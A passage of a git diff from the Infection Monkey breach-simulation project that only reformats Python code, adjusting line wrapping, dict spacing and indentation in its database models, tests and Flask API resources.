+ technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern),
+ mitigations=[],
)
@staticmethod
def dict_from_stix2_attack_patterns(stix2_dict: Dict[str, AttackPattern]):
return {
- key: AttackMitigations.mitigations_from_attack_pattern(attack_pattern)
+ key:AttackMitigations.mitigations_from_attack_pattern(attack_pattern)
for key, attack_pattern in stix2_dict.items()
}
diff --git a/monkey/monkey_island/cc/models/attack/mitigation.py b/monkey/monkey_island/cc/models/attack/mitigation.py
index 3c096b618..626c1800a 100644
--- a/monkey/monkey_island/cc/models/attack/mitigation.py
+++ b/monkey/monkey_island/cc/models/attack/mitigation.py
@@ -5,7 +5,6 @@ from monkey_island.cc.services.attack.test_mitre_api_interface import MitreApiIn
class Mitigation(EmbeddedDocument):
-
name = StringField(required=True)
description = StringField(required=True)
url = StringField()
diff --git a/monkey/monkey_island/cc/models/config.py b/monkey/monkey_island/cc/models/config.py
index f4af7b400..cb919cc58 100644
--- a/monkey/monkey_island/cc/models/config.py
+++ b/monkey/monkey_island/cc/models/config.py
@@ -8,5 +8,5 @@ class Config(EmbeddedDocument):
See https://mongoengine-odm.readthedocs.io/apireference.html#mongoengine.FieldDoesNotExist
"""
- meta = {"strict": False}
+ meta = {"strict":False}
pass
diff --git a/monkey/monkey_island/cc/models/creds.py b/monkey/monkey_island/cc/models/creds.py
index d0861846d..fd12cb6f4 100644
--- a/monkey/monkey_island/cc/models/creds.py
+++ b/monkey/monkey_island/cc/models/creds.py
@@ -6,5 +6,5 @@ class Creds(EmbeddedDocument):
TODO get an example of this data, and make it strict
"""
- meta = {"strict": False}
+ meta = {"strict":False}
pass
diff --git a/monkey/monkey_island/cc/models/edge.py b/monkey/monkey_island/cc/models/edge.py
index bb4f8a2c6..c5af09455 100644
--- a/monkey/monkey_island/cc/models/edge.py
+++ b/monkey/monkey_island/cc/models/edge.py
@@ -2,8 +2,7 @@ from mongoengine import BooleanField, Document, DynamicField, ListField, ObjectI
class Edge(Document):
-
- meta = {"allow_inheritance": True}
+ meta = {"allow_inheritance":True}
# SCHEMA
src_node_id = ObjectIdField(required=True)
diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py
index 90255099e..59d77b484 100644
--- a/monkey/monkey_island/cc/models/monkey.py
+++ b/monkey/monkey_island/cc/models/monkey.py
@@ -26,8 +26,10 @@ MAX_MONKEYS_AMOUNT_TO_CACHE = 100
class Monkey(Document):
"""
This class has 2 main section:
- * The schema section defines the DB fields in the document. This is the data of the object.
- * The logic section defines complex questions we can ask about a single document which are asked multiple
+ * The schema section defines the DB fields in the document. This is the data of the
+ object.
+ * The logic section defines complex questions we can ask about a single document which
+ are asked multiple
times, somewhat like an API.
"""
@@ -42,7 +44,8 @@ class Monkey(Document):
ip_addresses = ListField(StringField())
keepalive = DateTimeField()
modifytime = DateTimeField()
- # TODO make "parent" an embedded document, so this can be removed and the schema explained (and validated) verbosely.
+ # TODO make "parent" an embedded document, so this can be removed and the schema explained (
+ # and validated) verbosely.
# This is a temporary fix, since mongoengine doesn't allow for lists of strings to be null
# (even with required=False of null=True).
# See relevant issue: https://github.com/MongoEngine/mongoengine/issues/1904
@@ -56,11 +59,11 @@ class Monkey(Document):
# Environment related fields
environment = StringField(
- default=environment_names.Environment.UNKNOWN.value,
- choices=environment_names.ALL_ENVIRONMENTS_NAMES,
+ default=environment_names.Environment.UNKNOWN.value,
+ choices=environment_names.ALL_ENVIRONMENTS_NAMES,
)
aws_instance_id = StringField(
- required=False
+ required=False
) # This field only exists when the monkey is running on an AWS
# instance. See https://github.com/guardicore/monkey/issues/426.
@@ -143,10 +146,11 @@ class Monkey(Document):
Formats network info from monkey's model
:return: dictionary with an array of IP's and a hostname
"""
- return {"ips": self.ip_addresses, "hostname": self.hostname}
+ return {"ips":self.ip_addresses, "hostname":self.hostname}
@ring.lru(
- expire=1 # data has TTL of 1 second. This is useful for rapid calls for report generation.
+ expire=1
+ # data has TTL of 1 second. This is useful for rapid calls for report generation.
)
@staticmethod
def is_monkey(object_id):
diff --git a/monkey/monkey_island/cc/models/monkey_ttl.py b/monkey/monkey_island/cc/models/monkey_ttl.py
index e3025c250..193682617 100644
--- a/monkey/monkey_island/cc/models/monkey_ttl.py
+++ b/monkey/monkey_island/cc/models/monkey_ttl.py
@@ -7,10 +7,12 @@ class MonkeyTtl(Document):
"""
This model represents the monkey's TTL, and is referenced by the main Monkey document.
See https://docs.mongodb.com/manual/tutorial/expire-data/ and
- https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents/56021663#56021663
+ https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
+ -documents/56021663#56021663
for more information about how TTL indexing works and why this class is set up the way it is.
- If you wish to use this class, you can create it using the create_ttl_expire_in(seconds) function.
+ If you wish to use this class, you can create it using the create_ttl_expire_in(seconds)
+ function.
If you wish to create an instance of this class directly, see the inner implementation of
create_ttl_expire_in(seconds) to see how to do so.
"""
@@ -20,14 +22,16 @@ class MonkeyTtl(Document):
"""
Initializes a TTL object which will expire in expire_in_seconds seconds from when created.
Remember to call .save() on the object after creation.
- :param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take into consideration
+ :param expiry_in_seconds: How long should the TTL be in the DB, in seconds. Please take
+ into consideration
that the cleanup thread of mongo might take extra time to delete the TTL from the DB.
"""
# Using UTC to make the mongodb TTL feature work. See
- # https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents.
+ # https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired
+ # -documents.
return MonkeyTtl(expire_at=datetime.utcnow() + timedelta(seconds=expiry_in_seconds))
- meta = {"indexes": [{"name": "TTL_index", "fields": ["expire_at"], "expireAfterSeconds": 0}]}
+ meta = {"indexes":[{"name":"TTL_index", "fields":["expire_at"], "expireAfterSeconds":0}]}
expire_at = DateTimeField()
@@ -35,7 +39,8 @@ class MonkeyTtl(Document):
def create_monkey_ttl_document(expiry_duration_in_seconds):
"""
Create a new Monkey TTL document and save it as a document.
- :param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND - depends on mongodb
+ :param expiry_duration_in_seconds: How long should the TTL last for. THIS IS A LOWER BOUND -
+ depends on mongodb
performance.
:return: The TTL document. To get its ID use `.id`.
"""
diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py
index d21776f6f..2d802f00f 100644
--- a/monkey/monkey_island/cc/models/test_monkey.py
+++ b/monkey/monkey_island/cc/models/test_monkey.py
@@ -26,7 +26,8 @@ class TestMonkey:
mia_monkey_ttl.save()
mia_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=mia_monkey_ttl.id)
mia_monkey.save()
- # Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a real mongo instance.
+ # Emulate timeout - ttl is manually deleted here, since we're using mongomock and not a
+ # real mongo instance.
sleep(1)
mia_monkey_ttl.delete()
@@ -66,8 +67,8 @@ class TestMonkey:
@pytest.mark.usefixtures(FixtureEnum.USES_DATABASE)
def test_get_os(self):
linux_monkey = Monkey(
- guid=str(uuid.uuid4()),
- description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu",
+ guid=str(uuid.uuid4()),
+ description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu",
)
windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla")
unknown_monkey = Monkey(guid=str(uuid.uuid4()), description="bla bla bla")
@@ -83,20 +84,20 @@ class TestMonkey:
def test_get_tunneled_monkeys(self):
linux_monkey = Monkey(guid=str(uuid.uuid4()), description="Linux shay-Virtual-Machine")
windows_monkey = Monkey(
- guid=str(uuid.uuid4()), description="Windows bla bla bla", tunnel=linux_monkey
+ guid=str(uuid.uuid4()), description="Windows bla bla bla", tunnel=linux_monkey
)
unknown_monkey = Monkey(
- guid=str(uuid.uuid4()), description="bla bla bla", tunnel=windows_monkey
+ guid=str(uuid.uuid4()), description="bla bla bla", tunnel=windows_monkey
)
linux_monkey.save()
windows_monkey.save()
unknown_monkey.save()
tunneled_monkeys = Monkey.get_tunneled_monkeys()
test = bool(
- windows_monkey in tunneled_monkeys
- and unknown_monkey in tunneled_monkeys
- and linux_monkey not in tunneled_monkeys
- and len(tunneled_monkeys) == 2
+ windows_monkey in tunneled_monkeys
+ and unknown_monkey in tunneled_monkeys
+ and linux_monkey not in tunneled_monkeys
+ and len(tunneled_monkeys) == 2
)
assert test
@@ -105,10 +106,10 @@ class TestMonkey:
hostname_example = "a_hostname"
ip_example = "1.1.1.1"
linux_monkey = Monkey(
- guid=str(uuid.uuid4()),
- description="Linux shay-Virtual-Machine",
- hostname=hostname_example,
- ip_addresses=[ip_example],
+ guid=str(uuid.uuid4()),
+ description="Linux shay-Virtual-Machine",
+ hostname=hostname_example,
+ ip_addresses=[ip_example],
)
linux_monkey.save()
diff --git a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py
index 727ec9a2a..3ffdb02b9 100644
--- a/monkey/monkey_island/cc/models/zero_trust/event.py
+++ b/monkey/monkey_island/cc/models/zero_trust/event.py
@@ -7,12 +7,15 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Event(EmbeddedDocument):
"""
- This model represents a single event within a Finding (it is an EmbeddedDocument within Finding). It is meant to
+ This model represents a single event within a Finding (it is an EmbeddedDocument within
+ Finding). It is meant to
hold a detail of the Finding.
This class has 2 main section:
- * The schema section defines the DB fields in the document. This is the data of the object.
- * The logic section defines complex questions we can ask about a single document which are asked multiple
+ * The schema section defines the DB fields in the document. This is the data of the
+ object.
+ * The logic section defines complex questions we can ask about a single document which
+ are asked multiple
times, or complex action we will perform - somewhat like an API.
"""
diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py
index 7ddf643fe..74660da50 100644
--- a/monkey/monkey_island/cc/models/zero_trust/finding.py
+++ b/monkey/monkey_island/cc/models/zero_trust/finding.py
@@ -12,25 +12,29 @@ import common.common_consts.zero_trust_consts as zero_trust_consts
class Finding(Document):
"""
- This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
+ This model represents a Zero-Trust finding: A result of a test the monkey/island might
+ perform to see if a
specific principle of zero trust is upheld or broken.
Findings might have the following statuses:
Failed ❌
Meaning that we are sure that something is wrong (example: segmentation issue).
Verify ⁉
- Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
+ Meaning that we need the user to check something himself (example: 2FA logs,
+ AV missing).
Passed ✔
Meaning that we are sure that something is correct (example: Monkey failed exploiting).
This class has 2 main section:
- * The schema section defines the DB fields in the document. This is the data of the object.
- * The logic section defines complex questions we can ask about a single document which are asked multiple
+ * The schema section defines the DB fields in the document. This is the data of the
+ object.
+ * The logic section defines complex questions we can ask about a single document which
+ are asked multiple
times, or complex action we will perform - somewhat like an API.
"""
# http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance
- meta = {"allow_inheritance": True}
+ meta = {"allow_inheritance":True}
# SCHEMA
test = StringField(required=True, choices=zero_trust_consts.TESTS)
diff --git a/monkey/monkey_island/cc/models/zero_trust/monkey_finding_details.py b/monkey/monkey_island/cc/models/zero_trust/monkey_finding_details.py
index 62cfda504..3568e0ee1 100644
--- a/monkey/monkey_island/cc/models/zero_trust/monkey_finding_details.py
+++ b/monkey/monkey_island/cc/models/zero_trust/monkey_finding_details.py
@@ -8,7 +8,6 @@ from monkey_island.cc.models.zero_trust.event import Event
class MonkeyFindingDetails(Document):
-
# SCHEMA
events = EmbeddedDocumentListField(document_type=Event, required=False)
diff --git a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py
index 174a68db7..7fd16de9d 100644
--- a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py
+++ b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py
@@ -13,7 +13,7 @@ class ScoutSuiteFinding(Finding):
@staticmethod
def save_finding(
- test: str, status: str, detail_ref: ScoutSuiteFindingDetails
+ test: str, status: str, detail_ref: ScoutSuiteFindingDetails
) -> ScoutSuiteFinding:
finding = ScoutSuiteFinding(test=test, status=status, details=detail_ref)
finding.save()
diff --git a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding_details.py b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding_details.py
index cbc8c5f29..9f2b24d9d 100644
--- a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding_details.py
+++ b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding_details.py
@@ -4,7 +4,6 @@ from monkey_island.cc.models.zero_trust.scoutsuite_rule import ScoutSuiteRule
class ScoutSuiteFindingDetails(Document):
-
# SCHEMA
scoutsuite_rules = EmbeddedDocumentListField(document_type=ScoutSuiteRule, required=False)
diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py
index 653be95ec..4fabe2eea 100644
--- a/monkey/monkey_island/cc/models/zero_trust/test_event.py
+++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py
@@ -9,17 +9,18 @@ class TestEvent:
def test_create_event(self):
with pytest.raises(ValidationError):
_ = Event.create_event(
- title=None, # title required
- message="bla bla",
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ title=None, # title required
+ message="bla bla",
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
with pytest.raises(ValidationError):
_ = Event.create_event(
- title="skjs", message="bla bla", event_type="Unknown" # Unknown event type
+ title="skjs", message="bla bla", event_type="Unknown" # Unknown event type
)
# Assert that nothing is raised.
_ = Event.create_event(
- title="skjs", message="bla bla", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK
+ title="skjs", message="bla bla",
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK
)
diff --git a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py
index f7cf39d22..2df690123 100644
--- a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py
+++ b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py
@@ -17,9 +17,9 @@ class TestMonkeyFinding:
def test_save_finding_validation(self):
with pytest.raises(ValidationError):
_ = MonkeyFinding.save_finding(
- test="bla bla",
- status=zero_trust_consts.STATUS_FAILED,
- detail_ref=MONKEY_FINDING_DETAIL_MOCK,
+ test="bla bla",
+ status=zero_trust_consts.STATUS_FAILED,
+ detail_ref=MONKEY_FINDING_DETAIL_MOCK,
)
@pytest.mark.usefixtures(FixtureEnum.USES_DATABASE)
@@ -27,17 +27,17 @@ class TestMonkeyFinding:
assert len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 0
event_example = Event.create_event(
- title="Event Title",
- message="event message",
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ title="Event Title",
+ message="event message",
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
monkey_details_example = MonkeyFindingDetails()
monkey_details_example.events.append(event_example)
monkey_details_example.save()
MonkeyFinding.save_finding(
- test=zero_trust_consts.TEST_SEGMENTATION,
- status=zero_trust_consts.STATUS_FAILED,
- detail_ref=monkey_details_example,
+ test=zero_trust_consts.TEST_SEGMENTATION,
+ status=zero_trust_consts.STATUS_FAILED,
+ detail_ref=monkey_details_example,
)
assert len(MonkeyFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1
diff --git a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py
index 07809cd90..f78802b16 100644
--- a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py
+++ b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py
@@ -20,9 +20,9 @@ class TestScoutSuiteFinding:
def test_save_finding_validation(self):
with pytest.raises(ValidationError):
_ = ScoutSuiteFinding.save_finding(
- test=zero_trust_consts.TEST_SEGMENTATION,
- status="bla bla",
- detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK,
+ test=zero_trust_consts.TEST_SEGMENTATION,
+ status="bla bla",
+ detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK,
)
@pytest.mark.usefixtures(FixtureEnum.USES_DATABASE)
@@ -34,9 +34,9 @@ class TestScoutSuiteFinding:
scoutsuite_details_example.scoutsuite_rules.append(rule_example)
scoutsuite_details_example.save()
ScoutSuiteFinding.save_finding(
- test=zero_trust_consts.TEST_SEGMENTATION,
- status=zero_trust_consts.STATUS_FAILED,
- detail_ref=scoutsuite_details_example,
+ test=zero_trust_consts.TEST_SEGMENTATION,
+ status=zero_trust_consts.STATUS_FAILED,
+ detail_ref=scoutsuite_details_example,
)
assert len(ScoutSuiteFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1
diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
index 0ac69df6d..2966f2e0e 100644
--- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
+++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py
@@ -8,12 +8,13 @@ from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH
class T1216PBAFileDownload(flask_restful.Resource):
"""
- File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
+ File download endpoint used by monkey to download executable file for T1216 ("Signed Script
+ Proxy Execution" PBA)
"""
def get(self):
executable_file_name = "T1216_random_executable.exe"
return send_from_directory(
- directory=os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "resources", "pba"),
- filename=executable_file_name,
+ directory=os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "resources", "pba"),
+ filename=executable_file_name,
)
diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py
index 570882dbd..3ca7a0f0c 100644
--- a/monkey/monkey_island/cc/resources/attack/attack_config.py
+++ b/monkey/monkey_island/cc/resources/attack/attack_config.py
@@ -11,14 +11,14 @@ class AttackConfiguration(flask_restful.Resource):
@jwt_required
def get(self):
return current_app.response_class(
- json.dumps(
- {"configuration": AttackConfig.get_config()},
- indent=None,
- separators=(",", ":"),
- sort_keys=False,
- )
- + "\n",
- mimetype=current_app.config["JSONIFY_MIMETYPE"],
+ json.dumps(
+ {"configuration":AttackConfig.get_config()},
+ indent=None,
+ separators=(",", ":"),
+ sort_keys=False,
+ )
+ + "\n",
+ mimetype=current_app.config["JSONIFY_MIMETYPE"],
)
@jwt_required
@@ -32,6 +32,6 @@ class AttackConfiguration(flask_restful.Resource):
AttackConfig.reset_config()
return jsonify(configuration=AttackConfig.get_config())
else:
- AttackConfig.update_config({"properties": json.loads(request.data)})
+ AttackConfig.update_config({"properties":json.loads(request.data)})
AttackConfig.apply_to_monkey_config()
return {}
diff --git a/monkey/monkey_island/cc/resources/attack/attack_report.py b/monkey/monkey_island/cc/resources/attack/attack_report.py
index 72860cab7..bb3162b2e 100644
--- a/monkey/monkey_island/cc/resources/attack/attack_report.py
+++ b/monkey/monkey_island/cc/resources/attack/attack_report.py
@@ -12,11 +12,11 @@ class AttackReport(flask_restful.Resource):
@jwt_required
def get(self):
response_content = {
- "techniques": AttackReportService.get_latest_report()["techniques"],
- "schema": SCHEMA,
+ "techniques":AttackReportService.get_latest_report()["techniques"],
+ "schema":SCHEMA,
}
return current_app.response_class(
- json.dumps(response_content, indent=None, separators=(",", ":"), sort_keys=False)
- + "\n",
- mimetype=current_app.config["JSONIFY_MIMETYPE"],
+ json.dumps(response_content, indent=None, separators=(",", ":"), sort_keys=False)
+ + "\n",
+ mimetype=current_app.config["JSONIFY_MIMETYPE"],
)
diff --git a/monkey/monkey_island/cc/resources/auth/auth.py b/monkey/monkey_island/cc/resources/auth/auth.py
index 47d68fb1a..a2cd6f858 100644
--- a/monkey/monkey_island/cc/resources/auth/auth.py
+++ b/monkey/monkey_island/cc/resources/auth/auth.py
@@ -19,13 +19,14 @@ def init_jwt(app):
user_store.UserStore.set_users(env_singleton.env.get_auth_users())
_ = flask_jwt_extended.JWTManager(app)
logger.debug(
- "Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4]
+ "Initialized JWT with secret key that started with " + app.config["JWT_SECRET_KEY"][:4]
)
class Authenticate(flask_restful.Resource):
"""
- Resource for user authentication. The user provides the username and hashed password and we give them a JWT.
+ Resource for user authentication. The user provides the username and hashed password and we
+ give them a JWT.
See `AuthService.js` file for the frontend counterpart for this code.
"""
@@ -50,14 +51,14 @@ class Authenticate(flask_restful.Resource):
# If the user and password have been previously registered
if self._authenticate(username, secret):
access_token = flask_jwt_extended.create_access_token(
- identity=user_store.UserStore.username_table[username].id
+ identity=user_store.UserStore.username_table[username].id
)
logger.debug(
- f"Created access token for user {username} that begins with {access_token[:4]}"
+ f"Created access token for user {username} that begins with {access_token[:4]}"
)
- return make_response({"access_token": access_token, "error": ""}, 200)
+ return make_response({"access_token":access_token, "error":""}, 200)
else:
- return make_response({"error": "Invalid credentials"}, 401)
+ return make_response({"error":"Invalid credentials"}, 401)
# See https://flask-jwt-extended.readthedocs.io/en/stable/custom_decorators/
@@ -67,8 +68,9 @@ def jwt_required(fn):
try:
flask_jwt_extended.verify_jwt_in_request()
return fn(*args, **kwargs)
- # Catch authentication related errors in the verification or inside the called function. All other exceptions propagate
+ # Catch authentication related errors in the verification or inside the called function.
+ # All other exceptions propagate
except (JWTExtendedException, PyJWTError) as e:
- return make_response({"error": f"Authentication error: {str(e)}"}, 401)
+ return make_response({"error":f"Authentication error: {str(e)}"}, 401)
return wrapper
diff --git a/monkey/monkey_island/cc/resources/auth/registration.py b/monkey/monkey_island/cc/resources/auth/registration.py
index e5ca99232..dbda4dbe7 100644
--- a/monkey/monkey_island/cc/resources/auth/registration.py
+++ b/monkey/monkey_island/cc/resources/auth/registration.py
@@ -8,12 +8,12 @@ from monkey_island.cc.environment.user_creds import UserCreds
class Registration(flask_restful.Resource):
def get(self):
- return {"needs_registration": env_singleton.env.needs_registration()}
+ return {"needs_registration":env_singleton.env.needs_registration()}
def post(self):
credentials = UserCreds.get_from_json(request.data)
try:
env_singleton.env.try_add_user(credentials)
- return make_response({"error": ""}, 200)
+ return make_response({"error":""}, 200)
except (InvalidRegistrationCredentialsError, RegistrationNotNeededError) as e:
- return make_response({"error": str(e)}, 400)
+ return make_response({"error":str(e)}, 400)
diff --git a/monkey/monkey_island/cc/resources/auth/user_store.py b/monkey/monkey_island/cc/resources/auth/user_store.py
index a35f4b3d6..da47545d5 100644
--- a/monkey/monkey_island/cc/resources/auth/user_store.py
+++ b/monkey/monkey_island/cc/resources/auth/user_store.py
@@ -11,5 +11,5 @@ class UserStore:
@staticmethod
def set_users(users: List[User]):
UserStore.users = users
- UserStore.username_table = {u.username: u for u in UserStore.users}
- UserStore.user_id_table = {u.id: u for u in UserStore.users}
+ UserStore.username_table = {u.username:u for u in UserStore.users}
+ UserStore.user_id_table = {u.id:u for u in UserStore.users}
diff --git a/monkey/monkey_island/cc/resources/bootloader.py b/monkey/monkey_island/cc/resources/bootloader.py
index b228b9eea..69d7e1584 100644
--- a/monkey/monkey_island/cc/resources/bootloader.py
+++ b/monkey/monkey_island/cc/resources/bootloader.py
@@ -16,23 +16,23 @@ class Bootloader(flask_restful.Resource):
elif os == "windows":
data = Bootloader._get_request_contents_windows(request.data)
else:
- return make_response({"status": "OS_NOT_FOUND"}, 404)
+ return make_response({"status":"OS_NOT_FOUND"}, 404)
result = BootloaderService.parse_bootloader_telem(data)
if result:
- return make_response({"status": "RUN"}, 200)
+ return make_response({"status":"RUN"}, 200)
else:
- return make_response({"status": "ABORT"}, 200)
+ return make_response({"status":"ABORT"}, 200)
@staticmethod
def _get_request_contents_linux(request_data: bytes) -> Dict[str, str]:
parsed_data = json.loads(
- request_data.decode()
- .replace('"\n', "")
- .replace("\n", "")
- .replace('NAME="', "")
- .replace('":",', '":"",')
+ request_data.decode()
+ .replace('"\n', "")
+ .replace("\n", "")
+ .replace('NAME="', "")
+ .replace('":",', '":"",')
)
return parsed_data
diff --git a/monkey/monkey_island/cc/resources/bootloader_test.py b/monkey/monkey_island/cc/resources/bootloader_test.py
index 83d780aa4..d8fd05451 100644
--- a/monkey/monkey_island/cc/resources/bootloader_test.py
+++ b/monkey/monkey_island/cc/resources/bootloader_test.py
@@ -43,12 +43,18 @@ class TestBootloader(TestCase):
b'{\x00"\x00s\x00y\x00s\x00t\x00e\x00m\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o'
b'\x00w\x00s\x00"\x00,\x00 \x00"\x00o\x00s\x00_\x00v\x00e\x00r\x00s\x00i\x00o\x00n'
b'\x00"\x00:\x00"\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x008\x00_\x00o\x00r\x00_\x00g\x00r'
- b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 \x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"'
- b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006\x00B\x00"'
- b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e\x00,\x00 '
- b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00[\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005'
- b'\x006\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009'
- b'\x00.\x001\x00"\x00,\x00 \x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.'
+ b'\x00e\x00a\x00t\x00e\x00r\x00"\x00,\x00 '
+ b'\x00"\x00h\x00o\x00s\x00t\x00n\x00a\x00m\x00e\x00"'
+ b'\x00:\x00"\x00D\x00E\x00S\x00K\x00T\x00O\x00P\x00-\x00P\x00J\x00H\x00U\x003\x006'
+ b'\x00B\x00"'
+ b'\x00,\x00 \x00"\x00t\x00u\x00n\x00n\x00e\x00l\x00"\x00:\x00f\x00a\x00l\x00s\x00e'
+ b"\x00,\x00 "
+ b'\x00"\x00i\x00p\x00s\x00"\x00:\x00 \x00['
+ b'\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x005'
+ b'\x006\x00.\x001\x00"\x00,\x00 '
+ b'\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x004\x009'
+ b'\x00.\x001\x00"\x00,\x00 '
+ b'\x00"\x001\x009\x002\x00.\x001\x006\x008\x00.\x002\x001\x007\x00.'
b'\x001\x00"\x00]\x00}\x00'
)
diff --git a/monkey/monkey_island/cc/resources/edge.py b/monkey/monkey_island/cc/resources/edge.py
index 4985d8a4d..83de87c04 100644
--- a/monkey/monkey_island/cc/resources/edge.py
+++ b/monkey/monkey_island/cc/resources/edge.py
@@ -11,6 +11,6 @@ class Edge(flask_restful.Resource):
edge_id = request.args.get("id")
displayed_edge = DisplayedEdgeService.get_displayed_edge_by_id(edge_id)
if edge_id:
- return {"edge": displayed_edge}
+ return {"edge":displayed_edge}
return {}
diff --git a/monkey/monkey_island/cc/resources/environment.py b/monkey/monkey_island/cc/resources/environment.py
index 03333b029..f435ea2a6 100644
--- a/monkey/monkey_island/cc/resources/environment.py
+++ b/monkey/monkey_island/cc/resources/environment.py
@@ -16,6 +16,7 @@ class Environment(flask_restful.Resource):
if env_singleton.env.needs_registration():
env_singleton.set_to_standard()
logger.warning(
- "No user registered, Island on standard mode - no credentials required to access."
+ "No user registered, Island on standard mode - no credentials required to "
+ "access."
)
return {}
diff --git a/monkey/monkey_island/cc/resources/island_configuration.py b/monkey/monkey_island/cc/resources/island_configuration.py
index 42730e477..2eac52375 100644
--- a/monkey/monkey_island/cc/resources/island_configuration.py
+++ b/monkey/monkey_island/cc/resources/island_configuration.py
@@ -11,8 +11,8 @@ class IslandConfiguration(flask_restful.Resource):
@jwt_required
def get(self):
return jsonify(
- schema=ConfigService.get_config_schema(),
- configuration=ConfigService.get_config(False, True, True),
+ schema=ConfigService.get_config_schema(),
+ configuration=ConfigService.get_config(False, True, True),
)
@jwt_required
diff --git a/monkey/monkey_island/cc/resources/local_run.py b/monkey/monkey_island/cc/resources/local_run.py
index 727357ab3..73472defa 100644
--- a/monkey/monkey_island/cc/resources/local_run.py
+++ b/monkey/monkey_island/cc/resources/local_run.py
@@ -17,7 +17,6 @@ from monkey_island.cc.services.utils.network_utils import local_ip_addresses
__author__ = "Barak"
-
logger = logging.getLogger(__name__)
@@ -34,7 +33,8 @@ def run_local_monkey():
monkey_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "binaries", result["filename"])
target_path = os.path.join(env_singleton.env.get_config().data_dir_abs_path, result["filename"])
- # copy the executable to temp path (don't run the monkey from its current location as it may delete itself)
+ # copy the executable to temp path (don't run the monkey from its current location as it may
+ # delete itself)
try:
copyfile(monkey_path, target_path)
os.chmod(target_path, stat.S_IRWXU | stat.S_IRWXG)
@@ -78,4 +78,4 @@ class LocalRun(flask_restful.Resource):
return jsonify(is_running=local_run[0], error_text=local_run[1])
# default action
- return make_response({"error": "Invalid action"}, 500)
+ return make_response({"error":"Invalid action"}, 500)
diff --git a/monkey/monkey_island/cc/resources/log.py b/monkey/monkey_island/cc/resources/log.py
index aae23fed3..fd8b269bc 100644
